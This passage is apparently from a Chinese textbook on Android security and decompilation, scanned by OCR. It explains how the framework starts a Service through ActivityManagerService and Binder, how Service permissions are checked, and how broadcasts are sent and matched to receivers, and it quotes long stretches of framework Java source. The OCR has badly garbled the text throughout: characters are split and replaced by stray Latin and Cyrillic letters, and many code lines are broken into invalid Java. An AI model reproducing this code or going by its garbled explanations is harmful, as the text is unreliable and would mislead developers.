data.recycle(); 
reply.recycle(); 


} 
通过 上 述 实现 代码 ， 将 新 进程 中 的 DApplicationThread 实例 通过 Binder 驱动 程序 传递 给 Activity- 


ManagerService。 


开始 执行 函数 ActivityManagerService.attachApplication0， 此 函数 定义 在 文件 frameworks/base/services/ 


java/com/android/server/am/ActivityManagerService.java 中 ， 主 要 实现 代码 如 下 所 示 。 


public final class ActivityManagerService extends ActivityManagerNative 
implements Watchdog.Monitor, BatteryStatsImpl.BatteryCallback { 


public final void attachApplication(IApplicationThread thread) 


1 Android 系统 安全 和 反 编译 实战 


í 
synchronized (this) ( 
int callingPid = Binder.getCallingPid(); 
final long origld = Binder.clearCallingldentity(); 
attachApplicationLocked(thread, callingPid); 
Binder.restoreCallingldentity(origld); 
} 
} 


} 

在 上 述 代码 中 ， 通 过 调用 函数 attachApplicationLocked() 9: JW dE — 25 4b FB. В 3 ActivityManager- 
Service.attachA pplicationLocked() fE: frameworks/base/services/java/com/android/server/am/Activity ManagerService.java 文件 
中 定义 ， 主 要 实现 代码 如 下 所 示 。 

public final class ActivityManagerService extends ActivityManagerNative 


implements Watchdog.Monitor BatteryStatsImpl.BatteryCallback ( 


private final boolean attachApplicationLocked(IApplicationThread thread, 
int pid) ( 
11 Find the application record that is being attached... either via 
II the pid if we are running in multiple processes, or just pull the 
ll next app record if we are emulating process with anonymous threads 
ProcessRecord app; 
if (pid != МҮ РІО && pid >= 0) ( 
synchronized (mPidsSelfLocked) ( 
app 7 mPidsSelfLocked.get(pid); 
} 
} else if (mStartingProcesses.size() > 0) { 
app = mStartingProcesses.remove(0); 
app.setPid(pid); 
) else { 
app = null; 
} 


String processName = app.processName; 


app.thread =thread; 


boolean badApp = false; 
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II Find any services that should be running in this process... 
if (IbadApp && mPendingServices.size() > 0) { 
ServiceRecord sr = null; 
try ( 
for (int i=0; i<mPendingServices.size(); i++) { 
sr = mPendingServices.get(i); 
if (app.info.uid != sr.applnfo.uid 
|| 'processName.equals(sr.processName)) { 
continue; 


} 


mPendingServices.remove(i); 
= 

realStartServiceLocked(sr, app); 
didSomething = true; 


} 
) catch (Exception e) ( 
} 
E 
return true; 


上 述 代 码 主要 实现 如 下 两 个 功能 。 

口 取出 前 面 以 新 进程 的 pid 值 作为 key 值 保存 的 一 个 ProcessRecord 在 mPidsSelfLocked 列 表 中 ,并 存放 在 
本 地 变量 app 中 ， 并 且 将 app.processName 保 存在 本 地 变量 processName 中 。 

О 将 前 面 在 成 员 变量 mPendingServices 中 保存 的 一 个 ServiceRecord， 在 此 通过 进程 uid 和 进程 名 称 找 出 
来 ， 然 后 通过 realStartServiceLocked() 函 数 来 进一步 处 理 。 

再 看 函数 ActivityManagerService.realStartServiceLocked0 ， 此 函数 在 文件 frameworks/base/services/ 

java/com/android/server/am/ActivityManagerService.java 中 定义 ， 主 要 实现 代码 如 下 所 示 。 
class ActivityManagerProxy implements lActivityManager 
{ 


private final void realStartServiceLocked(ServiceRecord r, 
ProcessRecord app) throws RemoteException { 
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г.арр = app; 
try { 
app.thread.scheduleCreateService(r, rservicelnfo); 


} finally { 


} 

在 上 述 代 码 中 ，app.thread 是 一 个 ApplicationThread 对 象 的 远程 接口 ， 是 在 创建 ActivityThread 对 象 时 
作为 ActivityThread 对 象 的 成 员 变 量 同时 创建 的 。 调 用 远程 接口 函数 scheduleCreateService0， 以 回 到 原来 的 
ActivityThread 对 象 中 执行 启动 服务 的 操作 。 

再 看 函数 ApplicationThreadProxy.scheduleCreateService() ， 此 函数 在 文件 frameworks/base/core/java/ 
android/app/ApplicationThreadNative.java 中 定义 ,功能 是 通过 Binder 驱动 程序 回 到 新 进程 的 ApplicationThread 
对 象 中 去 执行 scheduleCreateService() 函 数 ， 主 要 实现 代码 如 下 所 示 。 

class ApplicationThreadProxy implements IApplicationThread { 


public final void scheduleCreateService(IBinder token, Servicelnfo info) 
throws RemoteException { 
Parcel data = Parcel.obtain(); 
data.writelnterfaceToken(IApplication Thread.descriptor); 
data.writeStrongBinder(token); 
info.writeToParcel(data, 0); 
mRemote.transact(SCHEDULE CREATE SERVICE TRANSACTION, data, null, 
IBinder.FLAG ONEWAY); 
data.recycle(); 
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再 看 函数 ApplicationThread.scheduleCreateService()， 此 函数 定义 在 frameworks/base/core/java/android/ 
app/ActivityThread.java 文件 中 ， 主 要 实现 代码 如 下 所 示 。 
public final class ActivityThread { 


private final class ApplicationThread extends ApplicationThreadNative { 


public final void scheduleCreateService(IBinder token, 
Servicelnfo info) ( 
CreateServiceData s = new CreateServiceData(); 
s.token = token; 
s.info = info; 


queueOrSendMessage(H.CREATE SERVICE, s); 


) 

在 上 述 代 码 中 ， 调 用 ActivityThread 的 queueOrSendMessage0 将 一 个 CreateServiceData 数据 放 到 消息 队 
列 中 去 ， 并 且 分 开 这 个 消息 。 

再 看 函数 ActivityThread.queueOrSendMessage() ， 此 函数 在 文件 frameworks/base/core/java/android/ 
app/ActivityThread.java 中 定义 ， 功 能 是 调用 成 员 变量 mH 的 sendMessage() 函 数 进行 消息 分 发 ， 其 中 mH 的 
类 型 为 H, #2 Handler 类 。 主 要 实现 代码 如 下 所 示 。 

public final class ActivityThread { 


private final void queueOrSendMessage(int what, Object obj) { 
queueOrSendMessage(what, obj, 0, 0); 
} 


private final void queueOrSendMessage(int what, Object obj, int arg1, int arg2) ( 
synchronized (this) { 


Message msg - Message.obtain(); 
msg.what - what; 

msg.obj = obj; 

msg.arg1 = arg1; 

msg.arg2 = arg2; 
mH.sendMessage (msg); 
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} 


} 

而 函数 H.sendMessage() 4k 7K F Handle 类 的 sendMessage0 函 数 ， 在 文件 frameworks/base/core/ 
java/android/os/Handlerjava 中 定义 。 当 消息 分 发 以 后 ， 就 进入 到 H.handleMessage(O) 函 数 进行 处 理 。 函 数 
H.handleMessage() 在 文件 frameworks/base/core/java/android/app/ActivityThread.java 中 定义 ， 主 要 实现 代码 如 
下 所 示 。 

public final class ActivityThread { 


private final class H extends Handler{ 
public void handleMessage(Message msg) ( 
Switch (msg.what) ( 


case CREATE SERVICE: 
handleCreateService((CreateServiceData)msg.obj); 
break; 


} 

函数 ActivityThread.handleCreateService();E ХЕ frameworks/base/core/java/android/app/ActivityThread.java Ж 
件 中 ， 主 要 实现 代码 如 下 所 示 。 

public final class ActivityThread { 
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private final void handleCreateService(CreateServiceData data) ( 


I| If we are getting ready to gc after going to the background, well 
11 we are back active so skip it 
unscheduleGcldler(); 


LoadedApk packagelnfo = getPackagelnfoNoCheck( 
data.info.applicationInfo); 
Service service = null; 
try { 
java.lang.ClassLoader cl = packagelnfo.getClassLoader(); 
service = (Service) cl.loadClass(data.info.name).newInstance(); 
} catch (Exception e) { 
if (ImInstrumentation.onException(service, e)) { 
throw new RuntimeException( 
"Unable to instantiate service " + data.info.name 
+":"+ e.toString(), е); 


} 


try { 
if (localLOGV) Slog.v(TAG, "Creating service " + data.info.name); 


Contextlmpl context = new Contextlmpl(); 
context.init(packagelInfo, null, this); 


Application app = packagelnfo.makeApplication(false, minstrumentation); 
context.setOuterContext(service); 
service.attach(context, this, data.info.name, data.token, app, 
ActivityManagerNative.getDefault()); 
service.onCreate(); 
mServices.put(data.token, service); 
try { 
ActivityManagerNative.getDefault().serviceDoneExecuting( 
data.token, 0, 0, 0); 
} catch (RemoteException e) { 
JI nothing to do 


} 


} catch (Exception e) { 
if (ImInstrumentation.onException(service, e)) { 
throw new RuntimeException( 
“Unable to create service " + data.info.name 
+":"+ e.toString(), е); 
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在 上 述 代码 中 ，data.info.name 就 是 自 定义 的 服务 类 shy.luo.ashmem.Server s 

接 下 来 看 ClassLoader.loadClass() 函 数 ， 功 能 是 实现 ActivityThread.handleCreateService() 函 数 中 的 如 下 
功能 。 

java.lang.ClassLoader cl = packagelnfo.getClassLoader(); 

service = (Service) cl.loadClass(data.info.name).newlnstance(); 

接 下 来 实现 Obtain Service 功能 ， 在 此 需要 实现 前 面 ActivityThread.handleCreateService() ЕЁ AKI!) JJ 88 > 
通过 ClassLoader.loadClass 导入 自 定义 的 服务 类 shy.luo.ashmem.Server 并 且 创 建 它 的 一 个 实例 后 ， 就 通过 强 
制 类 型 转换 得 到 一 个 Service 类 实例 ， 这 也 解答 了 自己 的 服务 类 必须 要 继承 于 Service 类 的 原因 。 

接 下 来 启动 Service.onCreate， 此 时 继续 实现 前 面 ActivityThread.handleCreateService() 函 数 中 的 如 下 代码 
功能 。 


service.onCreate(); 


9.5.0 4 种 操作 Service 的 权限 


在 Android 系统 中 ，Service 权限 可 以 限制 启动 、 绑 定 / 启 动 和 绑 定 关联 服务 的 组 件 或 应 用 程序 。 在 运行 
Context.startService(). Context.stopService() 和 Context.bindService() 过 程 时 ，Service 权限 要 进行 安全 检查 ， 
如 果 调用 者 没有 请 求 权 限 ， 则 会 为 调用 抛 出 一 个 安全 异常 (Security Exception) 。 

在 Android 系统 中 不 能 独立 运行 Service 服务 , 需要 特意 调用 Context.startService() 或 Context.bindService() 
方法 启动 服务 。 虽 然 这 两 种 方法 都 可 以 启动 Service， 但 是 两 者 的 使 用 场所 不 同 ， 有 具体 说 明 如 下 所 示 。 

C1) 当 使 用 startService() 方 法 启动 服务 时 ， 调 用 者 与 服务 之 间 没 有 关联 ， 即 使 调用 者 退出 ， 服 务 仍 可 
运行 。 

(2) 当 使 用 bindService() 方 法 启动 服务 时 ， 调 用 者 与 服务 绑 定 在 一 起 ， 调 用 者 一 旦 退出 ， 服 务 也 就 
终止 。 

(3) 如 果 使 用 startService() 方 法 启动 服务 ， 系 统 会 在 还 未 被 创建 服务 时 先 调 用 服务 的 onCreate() 方 法 ， 
接着 调用 onStart0 方 法 。 如 果 在 调用 onStart() 方 法 之 前 服务 已 经 被 创建 ， 即 使 多 次 调用 startService() 方 法 也 
不 会 导致 多 次 创建 服务 的 情形 ， 但 是 会 导致 多 次 调用 onStart0 方 法 的 情形 发 生 。 如 果 采 用 startService() 方 法 
启动 服务 ， 只 能 调用 Context.stopService() 方 法 结束 服务 ， 在 服务 结束 时 会 调用 onDestroy() 方 法 。 

(4) 如 果 使 用 bindStart() 方 法 启动 服务 ， 系 统 会 在 服务 还 未 被 创建 时 先 调用 服务 的 onCreate() 方 法 ， 然 
后 调用 onBind0 方 法 ， 此 时 调用 者 和 服务 会 被 绑 定 在 一 起 。 如 果 调用 者 退出 ， 系 统 则 会 先 调用 服务 的 
onUnbind() 方 法 ， 然 后 调用 onDestroy() 方 法 。 如 果 调 用 bindService() 方 法 之 前 服务 已 经 被 绑 定 ， 那 么 ， 多 次 
调用 bindService() 方 法 并 不 会 导致 多 次 创建 服务 及 绑 定 〈 也 就 是 说 onCreate0 和 onBind() 方 法 并 不 会 多 次 被 
调用 ) 。 如 果 调 用 者 希望 与 正在 绑 定 的 服务 解除 绑 定 ， 可 调用 unbindService() 方 法 ， 调 用 该 方法 也 会 导致 系 
统 调用 服务 的 onUnbind0 和 onDestroy() 方 法 。 


9.6 Broadcast Receiver 组 件 的 安全 机 制 


Eden 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 9 XP Broadcast Receiver 组 件 的 安全 机 制 .avi 

在 Android 应 用 程序 中 ， 通 过 <receiver> 标 签 限制 能 够 为 相关 联 的 接收 者 发 送 广播 意图 的 组 件 或 应 用 程 
序 。 在 Context.broadcastIntent0 返 回 后 检查 此 权限 ， 同 时 系统 设法 将 广播 意图 送 递 至 相关 接收 者 。 因 此 ， 权 
限 失败 将 会 导致 殷 回 给 调用 者 一 个 异常 ， 提 示 不 能 送 递 到 目的 地 。 在 相同 方式 下 ， 可 以 使 Context. 
registerReceiver() 支持 一 个 权限 ， 使 其 控制 能 够 递送 广播 至 已 登记 节目 接收 者 的 组 件 或 应 用 程序 。 至 于 其 他 


e 


第 9 章 Android 应 用 组 件 的 


方式 ， 调 用 Context. broadcastIntent() 以 限制 能 够 被 允许 接收 广播 的 意图 接收 器 对 象 的 一 个 权限 。 

当 发 送 一 个 广播 意图 时 ， 开 发 者 总 是 能 指定 一 个 请 求 权限 ， 也 就 是 说 ， 接 收 者 也 必须 拥有 发 送 方 中 的 
权限 才 可 以 接收 广播 信息 。 为 了 接收 广播 意图 ,通过 调用 Context. broadcastIntent0 及 一 些 权限 字符 串 的 方式 
可 以 请 求 一 个 接收 器 应 用 程序 必须 支持 那个 权限 。 

在 Android 系统 中 ， 接 收 者 和 广播 者 都 能 请 求 权限 。 对 于 Intent 来 说 ， 为 了 传递 意图 到 共同 的 目的 地 ， 
这 两 个 权限 检查 都 必须 通过 。Android 系统 为 了 安全 起 见 ， 对 于 一 些 系 统 的 相关 操作 定义 了 很 多 权限 ， 例 如 
打 电 话 、 发 短信 等 。 为 了 确保 应 用 程序 安全 和 稳定 性 ， 可 以 自 定义 一 些 权 限 机 制 来 阻止 其 他 应 用 程序 对 本 
应 用 程序 的 相关 操作 。 对 于 Service 和 BroadcastReceiver 来 说 ， 除 了 可 以 设置 权限 限制 访问 外 ， 还 可 以 通过 
设置 android:exported="false" 的 方式 来 控制 该 组 件 是 否 接 受 外 来 应 用 程序 的 访问 。 


9.6.1 Broadcast 基础 


在 Android 系统 中 , Broadcast 是 一 种 广泛 运用 在 应 用 程序 之 间 传 输 信息 的 机 制 . 其 中 , Broadcast Receiver 
负责 对 发 送出 来 的 Broadcast 进行 过 滤 接 收 并 响应 ， 而 BroadcastReceiver 负责 接收 广播 通知 信息 并 做 出 对 应 
的 处 理 。 

在 Android 系统 中 ， 发 送 Broadcast 和 使 用 BroadcastReceiver 过 滤 接 收 的 过 程 如 下 所 示 。 

(1) 首先 在 需要 发 送信 息 的 地 方 ， 把 要 发 送 的 信息 和 用 于 过 滤 的 信息 〈 如 Action, Category) 装 入 一 
个 Intent 对 象 。 

(2) 通过 调用 Context.sendBroadcast(). sendOrderBroadcast()#% sendStickyBroadcast() 方 法 ， 把 Intent 
对 象 以 广播 方式 发 送出 去 。 

(3) 当 发 送 Intent 以 后 ， 所 有 已 经 注册 的 BroadcastReceiver 会 检查 注册 时 的 IntentFilter 是 否 与 发 送 的 
Intent 相 匹 配 ， 如 果 匹 配 则 调用 BroadcastReceiver 的 onReceive() 方 法 。 所 以 当 定 义 一 个 BroadcastReceiver 
时 ， 都 需要 实现 onReceive() 方 法 。 

在 现实 开发 应 用 中 ， 有 如 下 两 种 注册 BroadcastReceiver 的 方式 。 

COD 静态 方式 : 在 文件 AndroidManifest.xml 中 用 <receiver> 标 签 声明 注册 ， 并 在 标签 内 用 <intent- filter» 
标签 设置 过 滤器 。 

(2) 动态 方式 : 在 代码 中 先 定 义 并 设置 好 一 个 IntentFilter 对 象 ， 然 后 在 需要 注册 的 地 方 调 Context. 
registerReceiver0 方 法 ， 如 果 取 消 就 调用 Context.unregisterReceiver() 方 法 。 如 果 用 动态 方式 注册 的 
BroadcastReceiver 的 Context 对 象 被 销毁 ，BroadcastReceiver 也 就 自动 取消 注册 了 。 (特别 注意 ， 有 些 可 能 
需要 进行 后 台 监听 ， 如 短信 消息 。) 

如 果 在 使 用 sendBroadcast0 的 方法 时 指定 了 接收 权限 ， 则 只 有 在 AndroidManifest.xml 中 用 <uses- 
permission> 标 签 声明 了 拥有 此 权限 的 BroadcastReceiver 才 会 有 可 能 接收 到 发 送 来 的 Broadcast。 同 样 ， 若 在 
注册 BroadcastReceiver 时 指定 了 可 接收 的 Broadcast 的 权限 ， 则 只 有 在 包 内 的 AndroidManifest.xml 中 用 
<uses-permission> 标 签 进行 声明 ， 拥 有 此 权限 的 Context. 对 象 所 发 送 的 Broadcast 才能 被 这 个 
BroadcastReceiver 所 接收 。 

在 Android 开发 应 用 中 ， 广 播 事件 的 基本 流程 如 下 所 示 。 

СТ) 注册 广播 事件 : 注册 方式 有 两 种 ， 一 种 是 静态 注册 ， 即 在 AndroidManifest.xml 文件 中 定义 ， 注 册 
的 广播 接收 器 必须 继承 BroadcastReceiver: 另 一 种 是 动态 注册 ， 是 在 程序 中 使 用 ContextregisterReceiver 注 
册 ， 注 册 的 广播 接收 器 相当 于 一 个 匿名 类 。 两 种 方式 都 需要 IntentFilter。 

(2) 发 送 广播 事件 : 通过 Context.sendBroadcast Ki, ЕН Intent 传递 注册 时 用 到 的 Action. 

(3) 接收 广播 事件 : 当 发 送 的 广播 被 接收 器 监听 到 后 ， 会 调用 其 onReceive0 方 法 ， 并 将 包含 消息 的 Intent 
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对 象 传 给 它 。onReceive0 中 代码 的 执行 时 间 不 要 超过 5 ЖУ, fill] Android 会 弹出 超时 对 话 框 。 

在 Android 系统 中 ， 发 送 广播 功能 是 通过 sendBroadcast 实现 的 ， 整 个 过 程 以 ActivityManagerService 为 
中 心 。 广 播 的 发 送 者 将 广播 发 送 到 ActivityManagerService， 当 ActivityManagerService 接收 到 这 个 广播 后 ， 
会 在 自己 的 注册 中 心 查看 有 哪些 广播 接收 器 订阅 了 这 个 广播 ， 然 后 将 此 广播 逐一 发 送 到 这 些 广播 接收 器 中 。 
上 述 广播 过 程 中 的 发 送 和 处 理 是 异步 实现 的 ，ActivityManagerService 并 不 等 待 广 播 接收 器 处 理 完 这 些 广播 
就 会 返回 。 由 此 可 见 , 广播 的 发 送 路 径 就 是 从 发 送 者 到 ActivityManagerService, 再 从 ActivityManagerService 
到 接收 者 ， 这 中 间 的 两 个 过 程 都 是 通过 Binder 进程 间 通 信 机 制 来 完成 的 。 


9.6.2 intent 描述 指示 


在 Android 应 用 开发 过 程 中 ， 当 在 某 个 service 中 想 要 发 送 广播 时 ， 通 常会 调用 如 下 代码 来 实现 。 
Intent intent = new Intent(BROADCAST_COUNTER_ACTION); 
intent.putExtra(COUNTER VALUE, counter); 
sendBroadcast(intent); 
Android 中 的 广播 使 用 Intent Hii, BROADCAST COUNTER ACTION 就 是 用 来 和 广播 接收 者 的 类 型 
进行 匹配 的 。 在 类 Intent 中 的 定义 代码 如 下 所 示 。 
public class Intent implements Parcelable, Cloneable ( 
I 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 - 
private String mAction; 
private Uri mData; 
private String mType; 
private String mPackage; 
private ComponentName mComponent; 
private int mFlags; 
private HashSet<String> mCategories; 
private Bundle mExtras; 
private Rect mSourceBounds; 


} 
在 上 述 代 码 中 ， 变 量 mAction 和 mExtras HAZ, HARA. 
9.6.3 ”传递 广播 信息 


在 文件 frameworks/base/core/java/android/content/ContextWrapper.java 中 定义 函数 sendBroadcast(), LHe 
是 调用 ContextImpl.sendBroadcast0 〇 实现 进一步 操作 ， 具 体 实现 代码 如 下 所 示 。 
public class ContextWrapper extends Context { 
Context mBase; 


public ContextWrapper(Context base) { 
mBase = base; 


} 


@Override 
public void sendBroadcast(Intent intent) { 
mBase.sendBroadcast(intent); 


@_ 
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在 上 述 代码 中 ， 变 量 mBase 是 一 个 ContextImpl 实例 。 
再 看 文件 frameworks/base/core/java/android/app/ContextImpl.java 中 的 函数 sendBroadcast()， 功 能 是 调用 
类 ActivityManagerService 中 的 远程 接口 ActivityManagerProxy， 将 这 个 广播 信息 发 送 给 ActivityManager- 
Services В sendBroadcast0 的 具体 实现 代码 如 下 所 示 。 
public void sendBroadcast(Intent intent) { 
warnlfCallingFromSystemProcess(); 
String resolvedType = intent.resolveTypelfNeeded(getContentResolver()); 
try( 
intent.prepareToLeaveProcess(); 
ActivityManagerNative.getDefault().broadcastIlntent( 
mMainThread.getApplicationThread(), intent, resolvedType, null, 
Activity.RESULT OK, null, null, null, AppOpsManager.OP NONE, false, false, 
getUserld()); 
) catch (RemoteException e) ( 
} 


} 
在 上 述 代码 中 ，resolvedType 表示 这 个 Intent 的 MIME 类 型 。 


9.64 封装 传递 


再 看 文件 frameworks/base/core/java/android/app/ActivityManagerNative.java 中 的 函数 broadcastlntent(), 
功能 是 封装 传递 的 参数 ， 并 通过 Binder 驱动 程序 进入 到 类 ActivityManagerService 中 的 函数 broadcastlntent() 
中 。 函 数 broadcastIntent() 的 具体 实现 代码 如 下 所 示 。 

public int broadcastlntent(IApplicationThread caller, 
Intent intent, String resolvedType, lIntentReceiver resultTo, 
int resultCode, String resultData, Bundle map, 
String requiredPermission, int appOp, boolean serialized, 
boolean sticky, int userld) throws RemoteException 


Parcel data = Parcel.obtain(); 
Parcel reply = Parcel.obtain(); 

/将 传 进来 的 参数 写 入 data 对 象 中 
data.writelnterfaceToken(IActivityManager.descriptor); 
data.writeStrongBinder(caller != null ? caller.asBinder() : null); 
intent.writeToParcel(data, 0); 
data.writeString(resolvedType); 
data.writeStrongBinder(resultTo != null ? resultTo.asBinder() : null); 
data.writelnt(resultCode); 
data.writeString(resultData); 
data.writeBundle(map); 
data.writeString(requiredPermission); 
data.writelnt(appOp); 
data.writelnt(serialized ? 1 : 0); 
data.writelnt(sticky ? 1 : 0); 
data.writelnt(userld); 
mRemote.transact(BROADCAST_INTENT_TRANSACTION, data, reply, 0); 
reply.readException(); 
int res = reply.readint(); 
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reply.recycle(); 
data.recycle(); 
return res; 


) 
965 ”处 理发 送 请 


再 看 文件 frameworks/base/services/java/com/android/server/am/ActivityManagerService.java 中 的 函数 
broadcastIntent()， 功 能 是 处 理 类 型 为 BROADCAST INTENT TRANSACTION 的 进程 通信 请 求 。 函 数 
broadcastIntent() 的 具体 实现 代码 如 下 所 示 。 

public final int broadcastIntent(IApplication Thread caller, 

Intent intent, String resolvedType, IIntentReceiver resultTo, 

int resultCode, String resultData, Bundle map, 

String requiredPermission, int appOp, boolean serialized, boolean sticky, int userld) ( 

enforceNotlsolatedCaller("broadcastIntent"); 
synchronized(this) ( 

/验证 intent 描述 的 广播 内 容 是 否 合法 

intent = verifyBroadcastLocked(intent); 

/获取 发 送 广播 进程 的 身份 

final ProcessRecord callerApp = getRecordForAppLocked(caller); 

final int callingPid = Binder.getCallingPid(); 

final int callingUid = Binder.getCallingUid(); 

final long origld = Binder.clearCallingldentity(); 

// 调 用 函数 broadcastintentLocked， 处 理 参 数 intent 描述 的 广播 

int res = broadcastlntentLocked(callerApp, 
callerApp != null ? callerApp.info.packageName : null, 
intent, resolvedType, resultTo, 
resultCode, resultData, map, requiredPermission, appOp, serialized, sticky, 
callingPid, callingUid, userld); 

Binder.restoreCallingldentity(origld); 

return res; 


} 
9.66 ”查找 广播 接收 者 


再 看 文件 frameworks/base/services/java/com/android/server/am/ActivityManagerService.java 中 的 函数 
broadcastIntentLocked()， 功 能 是 查找 目标 广播 的 接收 者 。 此 函数 会 先是 根据 intent 找 出 相应 的 广播 接收 器 ， 
然后 验证 是 否 设 置 这 个 intent 的 Intent.FLAG RECEIVER REPLACE PENDING 位 。 如 果 没 有 ， 则 
ActivityManagerService 会 在 当前 的 系统 中 查看 有 没有 相同 的 intent 还 未 被 处 理 , 如 果 有 , 则 用 当前 新 的 intent 
来 替换 旧 的 intent. В broadcastIntentLocked0 的 具体 实现 代码 如 下 所 示 。 

private final int broadcastlntentLocked(ProcessRecord callerApp, 
String callerPackage, Intent intent, String resolvedType, 
lIntentReceiver resultTo, int resultCode, String resultData, 
Bundle map, String requiredPermission, int appOp, 
boolean ordered, boolean sticky, int callingPid, int callingUid, 
int userld){ 
intent = new Intent(intent); 


e 
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11 By default broadcasts do not go to stopped apps 
intent.addFlags(IntenLFLAG EXCLUDE STOPPED PACKAGES); 


if(DEBUG BROADCAST LIGHT) Slog.v( 
TAG, (sticky ? "Broadcast sticky: ": "Broadcast: ") * intent 
+" ordered=" + ordered + " userid=" + userld); 
if ((resultTo != null) && !ordered) { 
Slog.w(TAG, "Broadcast " + intent + " not ordered but result callback requested!"); 


} 
1 根据 intent 找 出 相应 的 广播 接收 器 


List receivers = null; 
List<BroadcastFilter> registeredReceivers = null; 
/| Need to resolve the intent to interested receivers... 
if ((intent.getFlags()&Intent.FLAG RECEIVER REGISTERED ONLY) 
== 0) { 

receivers = collectReceiverComponents(intent, resolvedType, users); 
} 
if (intent.getComponent() == null) { 

registeredReceivers = mReceiverResolver.queryintent(intent, 

resolvedType, false, userld); 


} 

/验证 是 否 设置 intent 的 Intent.FLAG_RECEIVER_REPLACE_PENDING 位 

final boolean replacePending = 
(intent.getFlags()&Intent.FLAG RECEIVER REPLACE PENDING) != 0; 


if(DEBUG BROADCAST) Slog.v(TAG, "Enqueing broadcast: " + intent.getAction() 
+" replacePending=" + replacePending); 


int NR 7 registeredReceivers !- null ? registeredReceivers.size() : 0; 
if (ordered && NR > 0) ( 
II If we are not serializing this broadcast, then send the 
II registered receivers separately so they don't wait for the 
// components to be launched 
final BroadcastQueue queue = broadcastQueueForlntent(intent); 
BroadcastRecord r = new BroadcastRecord(queue, intent, callerApp, 
callerPackage, callingPid, callingUid, requiredPermission, appOp, 
registeredReceivers, resultTo, resultCode, resultData, map, 
ordered, sticky, false, userld); 
if(DEBUG BROADCAST) Slog.v( 
TAG, "Enqueueing parallel broadcast " + r); 
final boolean replaced = replacePending && queue.replaceParallelBroadcastLocked(r); 
if (Ireplaced) ( 
queue.enqueueParallelBroadcastLocked(r); 
queue.scheduleBroadcastsLocked(); 
} 
registeredReceivers = null; 
NR=0; 
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11 Merge into one list 
int ir = 0; 
if (receivers != null) { 
1 A special case for PACKAGE ADDED: do not allow the package 
// being added to see this broadcast. This prevents them from 
// using this as a back door to get run as soon as they are 
// installed. Maybe in the future we want to have a special install 
// broadcast or such for apps, but we'd like to deliberately make 
ll this decision 
String skipPackages| ] = null; 
if (Intent. ACTION_PACKAGE_ADDED.equals(intent.getAction()) 
|| Intent ACTION_PACKAGE_RESTARTED.equals(intent.getAction()) 
|| IntenLACTION PACKAGE DATA CLEARED.equals(intent.getAction())) { 
Uri data = intent.getData(); 
if (data != null) ( 
String pkgName = data.getSchemeSpecificPart(); 
if (pkgName != null) { 
skipPackages 7 new String[ ] ( pkgName ); 
} 
} 
} else if (Intent ACTION_EXTERNAL_APPLICATIONS AVAILABLE.equals(intent.getAction())) { 
skipPackages = intent.getStringArrayExtra(Intent.EXTRA CHANGED PACKAGE LIST); 
} 
if (skipPackages != null && (skipPackages.length > 0)) { 
/循环 验证 是 否 存在 和 参数 intent 一 样 的 广播 
for (String skipPackage : skipPackages){ 
if (skipPackage != null) ( 
int NT = receivers.size(); 
for (int it=0; it<NT; it++) { 
Resolvelnfo curt = (Resolvelnfo)receivers.get(it); 
if (curt.activityInfo.packageName.equals(skipPackage)) ( 
receivers.remove(it); 
КЕ; 
NT--; 


) 


int NT = receivers != null ? receivers.size() : 0; 
int it = 0; 
Resolvelnfo curt = null; 
BroadcastFilter curr = null; 
while (it < NT && ir < NR) ( 
if (curt == null) ( 
curt = (Resolvelnfo)receivers.get(it); 
m 
if (curr == null) ( 
curr = registeredReceivers.get(ir); 


} 


(m, 
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if (curr.getPriority() >= curt.priority) ( 
11 Insert this broadcast record into the final list. 
receivers.add(it, curr); 


iret; 
curr = null; 
it++; 
NT++; 
) else ( 
11 Skip to the next Resolvelnfo in the final list 
it++; 
curt = null; 
} 
} 
} 
while (ir < NR) { 
if (receivers == null) { 
receivers = new ArrayList(); 
} 
receivers.add(registeredReceivers.get(ir)); 
iret; 
} 


if (receivers != null && receivers.size() > 0) 
|| resultTo != null) { 

BroadcastQueue queue = broadcastQueueForlntent(intent); 

BroadcastRecord r = new BroadcastRecord(queue, intent, callerApp, 
callerPackage, callingPid, callingUid, requiredPermission, appOp, 
receivers, resultTo, resultCode, resultData, map, ordered, 
sticky, false, userld); 

if (DEBUG_BROADCAST) Slog.v( 

TAG, "Enqueueing ordered broadcast" + r 
+": prev had " + queue.mOrderedBroadcasts.size()); 
if (DEBUG_BROADCAST) { 
int seq = r.intent.getIntExtra("seq", -1); 
Slog.i(TAG, "Enqueueing broadcast" + r.intent.getAction() + " seq=" + seq); 

) 

boolean replaced = replacePending && queue.replaceOrderedBroadcastLocked(r); 

if (Ireplaced) ( 

queue.enqueueOrderedBroadcastLocked(r); 
queue.scheduleBroadcastsLocked(); 


} 


return ActivitrManager.BROADCAST SUCCESS; 
) 

在 上 述 代码 中 , 成 员 变 量 mHandler 在 类 ActivityManagerService 的 内 部 被 定义 , 是 一 个 Handler 类 变量 ， 
通过 此 类 中 的 函数 sendEmptyMessage() 可 以 将 一 个 类 型 为 BROADCAST INTENT MSG 的 空 消息 放 进 
ActivityManagerService 的 消息 队列 中 去 。 此 处 的 空 消息 是 指 这 个 消息 除了 有 类 型 信息 之 外 ， 没 有 任何 其 他 
额外 的 信息 。 
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9.6.7 ”处 理 广播 信息 


下 面 看 函数 scheduleBroadcastsLocked()， 具 体 实现 代码 如 下 所 示 。 
private final void scheduleBroadcastsLocked(){ 
if(DEBUG BROADCAST) Slog.v(TAG, "Schedule broadcasts: current=" 
+ mBroadcastsScheduled); 
if (mBroadcastsScheduled) ( 
return; 


) 
mHandler.sendEmptyMessage(BROADCAST INTENT MSG); 
mBroadcastsScheduled = true; 


) 
在 上 述 代码 中 ，mBroadcastsScheduled 表示 是 否 已 经 向 所 有 运行 的 线程 发 送 了 一 个 类 型 为 BROA- 
DCAST_INTENT_MSG 的 消息 。 
再 看 文件 frameworks/base/services/java/com/android/server/am/ActivityManagerService.java 中 的 函数 
handleMessage()， 功 能 是 处 理 类 型 为 BROADCAST_INTENT_MSG 的 广播 信息 。 主 要 实现 代码 如 下 所 示 。 
public void handleMessage(Message msg) ( 
switch (msg.what) ( 
case SHOW_ERROR_MSG: ( 
HashMap data = (HashMap) msg.obj; 
boolean showBackground = Settings.Secure.getlnt(mContext.getContentResolver(), 
Settings.Secure.ANR_SHOW_BACKGROUND, 0) != 0; 
synchronized (ActivityManagerService.this) ( 
ProcessRecord proc = (ProcessRecord)data.get("app"); 
AppErrorResult res = (AppErrorResult) data.get("result"); 
if (proc != null && proc.crashDialog != null) ( 
